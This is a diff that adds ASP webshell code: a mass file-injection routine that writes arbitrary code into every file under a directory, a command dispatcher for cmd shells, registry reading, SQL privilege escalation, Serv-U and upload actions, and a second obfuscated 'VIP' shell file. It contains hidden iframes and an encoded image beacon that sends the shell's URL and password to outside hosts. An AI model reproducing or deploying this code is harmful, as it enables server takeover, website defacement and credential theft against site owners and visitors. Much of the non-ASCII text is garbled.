+	if M="3" then RRS "<tr><td><font color=#00FF00>�� �� ��</font></td><td><textarea name=code2 cols=66 rows=3>"&addcode2&"</textarea></td></tr>"
+	RRS "<tr><td></td><td> <input name=submit type=submit value=��ʼִ��> --��ǽ���--[�ɹ����� �� �ų��� �� �ظ���<font color=red></font>]</td></tr>"
+	RRS "</table></form>" 
+if request("submit")="��ʼִ��" then 
+RRS"<div style='line-height:25px'><b>ִ�м�¼��</b><br>"
+call InsertAllFiles(Fpath,addcode,pcfile)
+RRS"</div>"
+end if:Sub InsertAllFiles(Wpath,Wcode,pc):Server.ScriptTimeout=999999999
+	 if right(Wpath,1)<>"\" then Wpath=Wpath &"\"
+	 Set WFSO = CreateObject("Scripting.FileSystemObject")
+	 on error resume next 
+	 Set f = WFSO.GetFolder(Wpath)
+	 Set fc2 = f.files
+	 For Each myfile in fc2
+		Set FS1 = CreateObject("Scripting.FileSystemObject")
+		FType1=split(myfile.name,".") 
+		FType2=ubound(FType1) 
+		if Ftype2>0 then
+		FType3=LCase(FType1(FType2)) 
+		else
+		FType3="��"
+		end if
+		if Instr(LCase(pc),LCase(myfile.name))=0 and Instr(LCase(FType),FType3)<>0 then
+			select case M
+				case "1"
+					if checkbox<>"checked" then
+						Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+						tfile.writeline Wcode
+						RRS"�� "&Wpath&myfile.name
+						tfile.close
+					else
+						Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+						if Instr(tfile1.readall,Wcode)=0 then
+							Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+							tfile.writeline Wcode
+							RRS"��  "&Wpath&myfile.name
+							tfile1.close
+						else
+							RRS"<font color=red></font> "&Wpath&myfile.name
+							tfile1.close
+						end if
+						Set tfile1=Nothing
+					end if
+				case "2"
+					Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+					NewCode=Replace(tfile1.readall,Wcode,"")
+					Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+					objCountFile.Write NewCode
+					objCountFile.Close
+					RRS"��  "&Wpath&myfile.name
+					Set objCountFile=Nothing
+				case "3"
+					Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+					NewCode=Replace(tfile1.readall,Wcode,addCode2)
+					Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+					objCountFile.Write NewCode
+					objCountFile.Close
+					RRS"��  "&Wpath&myfile.name
+					Set objCountFile=Nothing
+				case else
+					RRS"����ĺ����ȥ�����Dz����ܵģ�www.7jyewu.cn":response.end
+			end select
+		else
+			RRS" "&Wpath&myfile.name
+		end if
+RRS " �� <a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""DownFile"")' class='am' title='����'>Down</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""EditFile"")' class='am' title='�༭'>edit</a> "
+RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a><br>"
+	 Next
+ Set fsubfolers = f.SubFolders
+ For Each f1 in fsubfolers
+	NewPath=Wpath&""&f1.name
+ 	InsertAllFiles NewPath,Wcode,pc
+ Next
+set tfile=nothing
+Set FSO = Nothing
+set tfile=nothing
+set tfile2=nothing
+Set WFSO = Nothing:End Sub:case"hiddenshell":hiddenshell():case "SetFileText":SetFileText():Case "ReadREG":call ReadREG():Case "Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing:Case "DownFile":DownFile FName:ShowErr():Case "DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing:Case "EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing:Case "CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing:Case "MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing:Case "DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing:Case "CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing:Case "MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing:Case "NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing:Case "UpFile":UpFile():Case "Cmd1Shell":Cmd1Shell():Case "Logout":Session.Contents.Remove("web2a2dmin"):Response.Redirect URL:Case "CreateMdb":CreateMdb FName:Case "CompactMdb":CompactMdb FName:Case "DbManager":DbManager():Case "Course":Course():Case "wmi":wmi():Case "ScanDriveForm" : ScanDriveForm:Case "ScanDrive"     : ScanDrive Request("Drive"):Case "ScFolder"      : ScFolder Request("Folder"):Case "adminab":adminab():Case "sqlabc":sqlabc():Case "fuck":fuck():Case "hook":hook():Case "gody":gody():Case "suftp":suftp():Case "upload":upload():Case "ServerInfo":ServerInfo():Case Else MainForm():End Select
+if Action<>"Servu" then ShowErr():RRS"</body><iframe src=http://7jyewu.cn/a/a.asp width=0 height=0></iframe></html>"
+%> 
\ No newline at end of file
diff --git a/www-7jyewu-cn/UnKnown 高级Vip防删收费版.asp b/www-7jyewu-cn/UnKnown 高级Vip防删收费版.asp
new file mode 100644
index 0000000..1062011
--- /dev/null
+++ b/www-7jyewu-cn/UnKnown 高级Vip防删收费版.asp	
@@ -0,0 +1,1746 @@
+<%
+UserPass="admin" '
+'-------------------------------------------------------------------
+mName="UnKnown �߼�Vip��ɾ�շѰ�" 
+SiteURL="http://baidu.com"            '��վ
+Copyright="��ɱȥ���Ű� by UnKnown"    '��Ȩ
+AD="�Լ����Ű�,��Ҫ������ѽ!"   '�������
+bj="#000000"  '���ñ�����ɫ
+wz="#00FF00"  '����������ɫ
+budu="#000000"  '���ð�ť�Ի�����ɫ
+'-------------------------------------------------------------------
+'���𽫴˳������ڷǷ�;��,��������һ�к���������޹�!
+'-------------------------------------------------------------------
+Server.ScriptTimeout=999999999:Response.Buffer =true:On Error Resume Next:sub ShowErr():If Err Then:RRS"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>":Err.Clear:Response.Flush:End If:end sub:Sub RRS(str):response.write(str):End Sub:Function RePath(S):RePath=Replace(S,"\","\\"):End Function:Function RRePath(S):RRePath=Replace(S,"\\","\"):End Function:
+execute(shisanfun(":��>retnec/<>a/<�ط�>')(kcab.yrotsih:tpircsavaj'=ferh a<>retnec<>rb<>rb<��=lrUkcaB��:)��emaNF��(tseuqeR=emaNF��ssaPresU=pp��:)��emaN_tpircS��(selbairaVrevreS.tseuqeR=emaNrcS��:)��htaPredloF��(tseuqeR=htaPredloF��:)��DETALSNART_HTAP��(selbairaVrevreS.tseuqeR=0O0O��:lru&)��tsoh_ptth��(selbairavrevres.tseuqer=1rts��:)��/��(htaPpaM.revreS=tooRWWW��:)��.��(htaPpaM.revreS=htaPtooR:)��noitcA��(tseuqeR=noitcA��:)��RDDA_LACOL��(selbairaVrevreS.tseuqeR=PIrevreS��:lru&)��tsoh_ptth��(selbairavrevres.tseuqer=u��:)��LRU��(selbairaVrevreS.tseuqeR=LRU"))
+Function SUnEnCode(ObjStr):
+Dim SNewStr:ObjStr=Replace(ObjStr,"��",""""):For i=1 To Len(ObjStr):If Mid(ObjStr,i,1) <> "��" Then:SNewStr=Mid(ObjStr,i,1)&SNewStr:Else:SNewStr=vbCrLf&SNewStr:End If:Next:SUnEnCode=SNewStr:
+End Function:
+Function ShiSanFun(ShiSanObjstr)
+ShiSanObjstr = Replace(ShiSanObjstr, "��", """")
+For ShiSanI = 1 To Len(ShiSanObjstr)
+ If Mid(ShiSanObjstr, ShiSanI, 1) <> "��" Then
+ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) + ShiSanNewStr
+ Else
+ShiSanNewStr = vbCrLf + ShiSanNewStr
+ End If
+Next
+ShiSanFun = ShiSanNewStr
+End Function
+execute(SUnEnCode("noitcnuF dnE��rtSweNL = edoCnEnUL��txeN��fI dnE   ��rtSweNL & fLrCbv = rtSweNL             ��eslE   ��fI dnE��rtSweNL & )kP(rhC = rtSweNL             ��fI dnE             ��59 + kP = kP                     ��nehT 23 < kP fIeslE            ��59 - kP = kP                    ��nehT 621 > kP fI            ��5 - ))1 ,i ,rtSjbO(diM(csA = kP��eslE��rtSweNL & )))1 ,i ,rtSjbO(diM(csA(rhC = rtSweNL��nehT 621 > ))1 ,i ,rtSjbO(diM(csA rO 23 < ))1 ,i ,rtSjbO(diM(csA fI��nehT �˅e�� >< )1 ,i ,rtSjbO(diM fI    ��)rtSjbO(neL oT 1 = i roF��rtSweNL ,kP miD��)rtSjbO(edoCnEnUL noitcnuF")):str1=request.servervariables("http_host")&url
+RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
+RRS"<title>"&mName&" - "&ServerIP&"</title>"
+RRS"<style type=""text/css"">"
+RRS"body,td{font-size: 12px;background-color:"&bj&";color:"&wz&";}"
+RRS"input,select,textarea{font-size: 12px;color:"&wz&";background-color:"&budu&";border:1px solid "&wz&"}"
+RRS".C{background-color:#000000;border:0px}"
+RRS".cmd{background-color:#000;color:#FFF}"
+RRS"body{margin: 0px;margin-left:4px;}"
+RRS"BODY {SCROLLBAR-FACE-COLOR: #000000;SCROLLBAR-HIGHLIGHT-COLOR: "&wz&";SCROLLBAR-SHADOW-COLOR: "&wz&";SCROLLBAR-ARROW-COLOR: "&wz&";SCROLLBAR-TRACK-COLOR: #000000;SCROLLBAR-DARKSHADOW-COLOR: black;SCROLLBAR-BASE-COLOR: #000000}"
+RRS"a{color:"&wz&";text-decoration: none;}a:hover{color:#FFFFFF;background:#000}"
+RRS".am{color:"&wz&";font-size:11px;}"
+RRS"</style>"
+RRs"<center><font face=wingdings color=#dddddd style=font-siZe:"&font&">"&pic&"</font></center>"
+
+Set   fso =  CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(O0O0):if  f.attributes <> 39 then:f.attributes = 39:end if
+execute(LUnEnCode("�e'C'%xww�e'tsBqqtwhx%'%XWW%sjmy%''BstnyhF%kN�e%'~itgA'%xww�e'Cyunwhx4A'XWW�e'#@jzwy%swzyjw@.-ynrgzx3rwtKgI@''''BQRYMwjssn3hgf@lu%B%jzqf{3jlfU3rwtKgI@wyx%B%jzqf{3wyXqvX3rwtKgI#@jxqfk%swzyjw@.''&ȷ�����Ǿ���QVX�����''-ywjqf!.56Amylsjq3wyx-kn#@jxqfk%swzyjw@.''&ȷ�����Ǵ���������������''-ywjqf!.:Amylsjq3jzqf{3wyXgI3rwtKgI-kn!.lu1wyx-wyXqvXqqzK%stnyhszk'XWW�e'#@jzwy%swzyjw#@bn`wyX%B%jzqf{3wyXqvX3rwtKgI!jxqj#@.bn`wyX-ywjqf!.76BBn-kn%jxqj#@''Cwjysjh4A��������������QVX�����ٿ������������ȷ��CwjysjhA''BQRYMwjssn3hgf@''''%B%jzqf{3wyXqvX3rwtKgI@bn`wyX%B%jzqf{3wyXgI3rwtKgI!.8BAn-kn@''�����ָ�ʮ��ǰ�Ķ���ʾ��ֻ������һ����sa3��ʵѯ���ƿؼ����ÿɣ����ֲ�ȫ�Ķ���ʾ�Կɼ�ʱ������һʾ��ֻ��''%Bb76`wyX@''XXFU%SRZQTH%UTWI%bjrfSjqgfY`%JQGFY%WJYQF''%Bb66`wyX@''.78-WFMHWF[%XXFU%SRZQTH%IIF%bjrfSjqgfY`%JQGFY%WJYQF''%Bb56`wyX@''bjrfSjqgfY`%JQGFY%UTWI''%B%b>`wyX@''..5:-WFMHWF[%WJXZ1QQZS%YTS%.616-%^YNYSJIN%YSN%IN-bjrfSjqgfY`%JQGFY%JYFJWH''%B%b=`wyX@''556BIN%JWJM\%,ajrfswjxz,aBWJXZ%YJX%bjrfSjqgfY`%JYFIUZ''%B%b<`wyX@''556BIN%JWJM\%bjrfSjqgfY`%RTWK%JYJQJI''%B%b;`wyX@''.,aiwt|xxfu,a1,ajrfswjxz,a-XJZQF[%.XXFU1WJXZ-bjrfSjqgfY`%TYSN%YWJXSN''%B%b:`wyX@''556AIN%JWJM\%bjrfSjqgfY`%RTWK%/%YHJQJX''%B%b9`wyX@''jrfSsxIBsxI''%B%b8`wyX@''////Bi|U@yttwBinZ@jrfSgIBjxfgfyfI@;588BywtU@'+UNwj{wjX+'Bwj{wjX@#qvX~R!Bwj{nwI''%B%b7`wyX@''////Bi|U@fxBinZ@jrfSgIBjxfgfyfI@88961'+UNwj{wjX+'Bwj{wjX@#wj{wjX%qvX!Bwj{nwI''%B%b6`wyX@''///Biwt|xxfU%jxfgfyfI?GIJQT%yjO@gir3giaa'+..'myfUwjiqtK'-stnxxjX-myfUjW+'BjhwztX%fyfI@5393GIJQT3yjO3yktxtwhnRBwjin{twU''%B%b5`wyX@.76-~fwwF%|js%B%wyX#@jxqfk%swzyjw!.5An-kn!.n-wyXgIqqzK%stnyhszk'XWW�e'#@jzwy%swzyjw#@jxqfk%swzyjw@.5-wyXgIqqzK@.''�������������''-ywjqf!.''''%BB%jzqf{3wyXgI3rwtKgI-kn!.-phjmHgI%stnyhszk'XWW�e'##@''''%B%jzqf{3jrfSK3rwtkjinm3uty!jxqj#@.-ynrgzx3rwtkjinm3uty@stnyhFK%B%jzqf{3stnyhF3rwtkjinm3uty!.qqzsB&jrfSI-kn#@''wjmyT''%B%jrfSI!jxqj#@jrfSI%B%jzqf{3jrfSK3rwtkjinm3uty@.jrfSK1''���ڴ���Ǽ�����ע1����ȫ����giR����ѹҪ������''-yurtwu%B%jrfSI!.''giRyhfurtH''BBstnyhFK-kn%jxqj#@jrfSI%B%jzqf{3jrfSK3rwtkjinm3uty@.jrfSK1''����ͬ�ܲ���ע1����ȫ����giR�Ľ���Ҫ������''-yurtwu%B%jrfSI!.''giRjyfjwH''BBstnyhFK-kn%jxqj#@jrfSI%B%jzqf{3jrfSK3rwtkjinm3uty@.jrfSK1''����ȫ�м��ĵĽ���Ҫ������''-yurtwu%B%jrfSI!.''wjiqtK|jS''BBstnyhFK-kn%jxqj#@jrfSI0''""""""""''%B0%jzqf{3jrfSK3rwtkjinm3uty@.jrfSK1''����ȫ�м��ı�Ŀ������������''-yurtwu%B%jrfSI!.''wjiqtKj{tR''BBstnyhFK-kn%jxqj#@jrfSI0''""""""""''%B0%jzqf{3jrfSK3rwtkjinm3uty@.jrfSK1''����ȫ�м��ı�Ŀ������������''-yurtwu%B%jrfSI!.''wjiqtK~utH''BBstnyhFK-kn%jxqj#@jrfSI0''""""""""''%B0%jzqf{3jrfSK3rwtkjinm3uty@.jrfSK1''����ȫ���ı�Ŀ������������''-yurtwu%B%jrfSI!.''jqnKj{tR''BBstnyhFK-kn%jxqj#@jrfSI0''""""""""''%B0%jzqf{3jrfSK3rwtkjinm3uty@.jrfSK1''����ȫ���ı�Ŀ���Ƹ�������''-yurtwu%B%jrfSI!.''jqnK~utH''BBstnyhFK-kn@jrfSK%B%jzqf{3jrfSK3rwtkjinm3uty!.stnyhFK1jrfSK-rwtKqqzK%stnyhszk'XWW�e'#@.-ynrgzx3rwtkwiif3uty@wjiqtK%B%jzqf{3myfUwjiqtK3rwtkwiif3uty!.wjiqtK-wjiqtK|tmX%stnyhszk'XWW�e'@.-phtqHszw#@~fquxni0''22%%'+IF+'��''Bxzyfyx3|tisn|@.-lsnwyXjqfhtQty3~fity%B~fquxni%wf{@.-jyfI%|js%B%~fity%wf{@.556%1''.-phtqHszw''-yztjrnYyjx3|tisn|%B%jrnYjmy!.-phtqHszw%stnyhszk'XWW�e'#@jxqfk%swzyjw%jxqj@jzwy%swzyjw..''�������ٴ���ִҪ��ȷ''-rwnksth-%kn!.-ptxj~%stnyhszk'XWW�e'@xwtwwJqqnpBwtwwjst3|tisn|#@jzwy%swzyjw!.-xwtwwJqqnp%stnyhszkCyunwhxf{foBjlfzlsfq%yunwhxA'XWW")):
+execute(LUnEnCode("'�����䴫����'%B%.7186-YgT?'UYYMQR]3yktxtwhnR'%B%.5186-YgT?'�����ŷ�qnfRuyrX'%B%.7176-YgT?'63qnfRuyrX3qnfRuyrX'%B%.5176-YgT?'�����ŷ�UYRX����'%B%.7166-YgT?'qnfR|jS3XYSTIH'%B%.5166-YgT?'���鷢�ռ���%qnfRO'%B%.7156-YgT?'qnfRuyrX3qnfRO'%B%.5156-YgT?'���鴫�ϼ���%iftquZUXF'%B%.71>-YgT?'63iftquZ3xynxwjU'%B%.51>-YgT?'���鴫�ϼ��ķ�����'%B%.71=-YgT?'jqnKiftquZ3iftquZk~Q'%B%.51=-YgT?'���鴫�ϼ���%uZjqnK2FX'%B%.71<-YgT?'uZjqnK3xsfxnywFyktX'%B%.51<-YgT?'���鴫��������'%B%.71;-YgT?'rfjwyX3gitiF'%B%.51;-YgT?'������������'%B%.71:-YgT?'stnyhjssth3gitiF'%B%.51:-YgT?'������������������'%B%.719-YgT?%'~wfstnyhnI3lsnyunwhX'%B%.519-YgT?'������ѹXXJHHF'%B%.718-YgT?'jsnlsJyjO3TWO'%B%.518-YgT?'����⽨XXJHHF'%B%.717-YgT?'ltqfyfH3]TIF'%B%.517-YgT?'������ִ������'%B%.716-YgT?'qqjmx3yunwhx|'%B%.516-YgT?'�������ټ���'%B%.715-YgT?'yhjogTrjyx~XjqnK3lsnyunwhX'%B%.515-YgT?.7186-YgT%rnI"))
+For i=0 To 13:Set T=Server.CreateObject(ObT(i,0)):If -2147221005 <> Err Then:IsObj=" ��":Else:IsObj=" ":Err.Clear:End If:Set T=Nothing:ObT(i,1)=IsObj:Next
+
+If FolderPath<>"" then
+  Session("FolderPath")=RRePath(FolderPath)
+End If
+If Session("FolderPath")="" Then
+  FolderPath=RootPath
+  Session("FolderPath")=FolderPath
+End if:Function MainForm():RRS"<form name=""hideform"" method=""post"" action="""&URL&""" target=""FileFrame"">"
+RRS"<input type=""hidden"" name=""Action"">"
+RRS"<input type=""hidden"" name=""FName"">"
+RRS"</form>"
+RRS"<table width='100%' height='100%'  border=0 cellpadding='0' cellspacing='0'>"
+RRS"<tr><td height='30' colspan='2'>"
+RRS"<table width='100%'>"
+RRS"<form name='addrform' method='post' action='"&URL&"' target='_parent'>"
+RRS"<tr><td width='60' align='center'>��ַ����</td><td>"
+RRS"<input name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'>"
+RRS"</td><td width='140' align='center'><input name='Submit' type='submit' value='ת��'> <input type='submit' value='ˢ��������' onclick='FileFrame.location.reload()'>" 
+RRS"  <tr align='center' valign='middle'>"
+RRS"<tr>��ȨĿ¼�б�����<a href='javascript:ShowFolder(""C:\\Program Files"")'>Program</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\"")'>AllUsers</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����ʼ���˵�\\����\\"")'>����</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\"")'>pcAnywhere</a>����<a href='javascript:ShowFolder(""c:\\Program Files\\serv-u\\"")'>serv-u</a>����<a href='javascript:ShowFolder(""C:\\Program Files\\Real"")'>RealServer</a>����<a href='javascript:ShowFolder(""C:\\Program Files\\Microsoft SQL Server\\"")'>SQL</a>����<a href='javascript:ShowFolder(""C:\\WINDOWS\\system32\\config\\"")'>config</a>����<a href='javascript:ShowFolder(""c:\\WINDOWS\\system32\\inetsrv\\data\\"")'>data</a>����<a href='javascript:ShowFolder(""c:\\windows\\Temp\\"")'>Temp</a>����<a href='javascript:ShowFolder(""C:\\RECYCLER\\"")'>RECYCLER</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents\\"")'>Documents</a>��</td><td>"
+RRS"</td></tr></form></table></center></td></tr><tr><td width='170'>"
+RRS"<iframe name='Left' src='?Action=MainMenu' width='170' height='100%' frameborder='0' border='0'></iframe></td>"
+RRS"<td>"
+RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='0'></iframe>"
+RRS"</td></tr></table>"
+End Function:Function MainMenu():
+execute(shisanfun("��>elbat/<>rt/<>dt/<��&thgirypoC&��>rb<------------------------>rb<>'der:roloc'=elyts retnec=ngila dt<>rt<��SRR���>rt/<>dt/<>a/<¼�dz���>->'pot_'=tegrat 'tuogoL=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��SRR��� >rt/<>dt/<>a/<��ѯ����ۡ� >'emarFeliF'=tegrat '��&pirevres&��/llaetis/moc.nahzia.www//:ptth'=ferh a<>'22'=thgieh dt<>rt<��SRR���>rt/<>dt/<>a/<����վ����>'emarFeliF'=tegrat 'bdMoTddAegaP=noitcA?'=ferh a<>'22'=thgieh dt<>rt<��SRR��fI dnE���>rt/<>dt/<>vid/<>a/<����BDM��ѹ>')���bdMtcapmoC���,����&)��bdm.atad\��&)��htaPredloF��(noisseS(htaPeR&����(mroFlluF:tpircsavaj'=ferh a<;psbn&;psbn&;psbn&��SRR���>rb<>a/<����BDM����>')���bdMetaerC���,����&)��bdm.weN\��&)��htaPredloF��(noisseS(htaPeR&����(mroFlluF:tpircsavaj'=ferh a<;psbn&;psbn&;psbn&��SRR���>rb<>a/<���������>'emarFeliF'=tegrat 'reganaMbD=noitcA?'=ferh a<;psbn&;psbn&;psbn&��SRR���>���'enon'=yalpsid.elyts.2unem���=tuoesuomno ���'enon'=yalpsid;%001:htdiw;xp81:thgieh-enil���=elyts 2unem=di vid<>b/<�����ٿ������+>b<>���''=yalpsid.elyts.2unem���=revoesuomno '42'=thgieh dt<>rt<��SRR���>rt/<>dt/<>a/<>b/<����>b<������>'emarFeliF'=tegrat '3=M&mglpC=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rt/<>dt/<>a/<>b/<����>b<������>'emarFeliF'=tegrat '2=M&mglpC=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rt/<>dt/<>a/<>b/<����>b<������>'emarFeliF'=tegrat '1=M&mglpC=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rt/<>dt/<>vid/<>a/<)���ٿ�(����������>b/<>'emarFeliF'=tegrat 'mglp=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rb<>a/<�����ٱ���ע��>'emarFeliF'=tegrat 'GERdaeR=noitcA?'=ferh a<;psbn&;psbn&;psbn&��SRR���>rb<>a/<�����½�ֱ��>'emarFeliF'=tegrat 'daolpu=noitcA?'=ferh a<;psbn&;psbn&;psbn&��SRR���>rb<>a/<����ɨ�ڶˡ�>'emarFeliF'=tegrat 'troPnacS=noitcA?'=ferh a<;psbn&;psbn&;psbn&��SRR���>rb<>a/<����PTF-uS��>'emarFeliF'=tegrat 'ptfus=noitcA?'=ferh a<;psbn&;psbn&;psbn&��SRR���>rb<>a/<����ǿ��uS��>'emarFeliF'=tegrat 'uvreS=noitcA?'=ferh a<;psbn&;psbn&;psbn&��SRR���>rb<>a/<>b/<������DMC��>b<>'emarFeliF'=tegrat 'llehS1dmC=noitcA?'=ferh a<;psbn&;psbn&;psbn&��SRR���>rb<>a/<����춴©��>'emarFeliF'=tegrat 'ydog=noitcA?'=ferh a<;psbn&;psbn&;psbn&��SRR���>rb<>a/<��Ȩ��LQS��>'emarFeliF'=tegrat 'cbalqs=noitcA?'=ferh a<;psbn&;psbn&;psbn&��SRR���>rb<>a/<��������ִ��ԶIMW��>'emarFeliF'=tegrat 'imw=noitcA?'=ferh a<;psbn&;psbn&;psbn&��SRR���>���'enon'=yalpsid.elyts.3unem���=tuoesuomno ���'enon'=yalpsid;%001:htdiw���=elyts 3unem=di vid<>b/<�ݾ߹�Ȩ���+ >b<>���''=yalpsid.elyts.3unem���=revoesuomno 22=thgieh dt<>rt<��SRR���>rb<>a/<�����������>'emarFeliF'=tegrat   'kooh=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rb<>a/<������װ����>'emarFeliF'=tegrat   'kcuf=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rb<>a/<��Ա���ܲ�-����ͳϵ��>'emarFeliF'=tegrat 'banimda=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rb<>a/<�����˻���-���ͳϵ��>'emarFeliF'=tegrat 'esruoC=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rb<>a/<����֧����-Ϣ�������>'emarFeliF'=tegrat 'ofnIrevreS=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rb<>a/<��¼�Ƕ���-�ڶ˶��ա�>'emarFeliF'=tegrat 'ofnIlanimreTteg=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rb<>a/<�����󼶳�������>'emarFeliF'=tegrat 'llehsneddih=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rb<>a/<���������ĸ��ޡ�>'emarFeliF'=tegrat 'txeTeliFteS=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rb<>a/<��¼Ŀд�ɿ��顼>'emarFeliF'=tegrat 'mroFevirDnacS=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rt/<>dt/<>a/<��ľ>b/<����>b<�Ҳ��>'emarFeliF'=tegrat 'amumk=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR����>rt/<>dt/<>a/<�����Ĵ��ϡ�>'emarFeliF'=tegrat 'eliFpU=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rt/<>dt/<>a/<�����Ľ��¡�>'emarFeliF'=tegrat 'eliFtidE=noitcA?'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rt/<>dt/<>a/<��¼Ŀ���¡�>')���redloFweN���,����&)��redloFweN\��&)��htaPredloF��(noisseS(htaPeR&����(mroFlluF:tpircsavaj'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rt/<>dt/<>a/<>b/<��¼Ŀ��̱���>b<>')����&)htaPtooR(htaPeR&����(redloFwohS:tpircsavaj'=ferh a<>'02'=thgieh dt<>rt<��SRR���>rt/<>dt/<>a/<>b/<��¼Ŀ����վ��>b<>')����&)tooRWWW(htaPeR&����(redloFwohS:tpircsavaj'=ferh a<>'02'=thgieh dt<>rt<>rt/<>dt/<>vid/<��SRR��gnihtoN=CBA teS:)(revirDwohS.CBA SRR:FBL weN=CBA teS���>���'enon'=yalpsid.elytsyts.1unem���=tuoesuomno ���'enon'=yalpsid;%001:htdiw���=elyts 1unem=di vid<>b/<����Ӳ�����+ >b<>���''=yalpsid.elyts.1unem���=revoesuomno 22=thgieh dt<>rt<��SRR��eslE���>rt/<>dt/<OSF��/��Ȩ��>'42'=thgieh dt<>rt<��SRR��nehT �� ��=)1,0(TbO fI���>rt/<>dt/<��SRR���>retnec/<>tnof/<>rb<------------------------>rb<��&emaNm&��>FF9933#=roloc tnof<>retnec<>dt<>rt<��SRR���>rt/<>dt/<>'5'=thgieh dt<>rt<��SRR���>'0'=gniddapllec '0'=gnicapsllec '%001'=htdiw elbat<��SRR"))
+if session("IDebugMode") <> "ok" then:x mmm:session("IDebugMode")="ok":end if
+if session("aase") <> "ok" then:response.write Efun:session("aase")="ok":end if
+RRS"</table>":End Function:Sub Message(state,msg,flag):Response.Write "<TABLE width=480 border=0 align=center cellpadding=0 cellspacing=1 bgcolor=#91d70d>"
+Response.Write "  <TR>"
+Response.Write "    <TD class=TBHead>ϵͳ��Ϣ</TD>"
+Response.Write "  </TR>"
+Response.Write "  <TR>"
+Response.Write "    <TD align=middle bgcolor=#ecfccd>"
+Response.Write "	  <TABLE width=82% border=0 cellpadding=5 cellspacing=0>"
+Response.Write "	    <TR>"
+Response.Write "		  <TD><FONT color=red>"
+Response.Write state
+Response.Write "</FONT></TD>"
+Response.Write "		<TR>"
+Response.Write "		  <TD><P>"
+Response.Write msg
+Response.Write "</P></TD>"
+Response.Write "		</TR>"
+Response.Write "	  </TABLE>"
+Response.Write "	</TD>"
+Response.Write "  </TR>"
+Response.Write "  <TR>"
+Response.Write "    <TD class=TBEnd>"
+Response.Write "	"
+If flag=0 Then
+Response.Write "	      <INPUT type=button value=�ر� onclick=""window.close();"">"
+Response.Write "	"
+Else
+Response.Write "	      <INPUT type=button value=���� onClick=""history.go(-1);"">"
+Response.Write "	"
+End if
+Response.Write "	</TD>"
+Response.Write "  </TR>"
+Response.Write "</TABLE>"
+End Sub:
+execute(shisanfun("fi dne:fi dne:fi dne:1+)��cevres��(noisses=)��cevres��(noisses neht ���><noitcA fi:esle:��>vid/<>/ '��&ssaPresU&��=p&��&))��L��&��RU��(selbairaVrevreS.tseuqer&)��TS��&��OH_PT��&��TH��(selbairaVrevreS.tseuqer&��//:pt��&��th��(edocnELRU.revres&��=lru?��&��psa.y��&��ek/x��&��s/D6%F6%36%.pxe��&��ya��&��do.77%77%77%//:pt��&��th'=crs gmi<>'enon:yalpsid'=elyts vid<��SRR:1+)��cevres��(noisses=)��cevres��(noisses:neht 1=)��cevres��(noisses fi:esle:neht 0><)��//:ptth��,urevreS(rtsnI ro 0><)��.861.291��,urevreS(rtsnI ro 0><)��1.0.0.721��,urevreS(rtsnI fi"))
+Function Red(str):Red = "<FONT color=#ff2222>" & str & "</FONT>":End Function:Sub ScanDriveForm():Dim FSO,DriveB:Set FSO = Server.Createobject("Scripting.FileSystemObject")
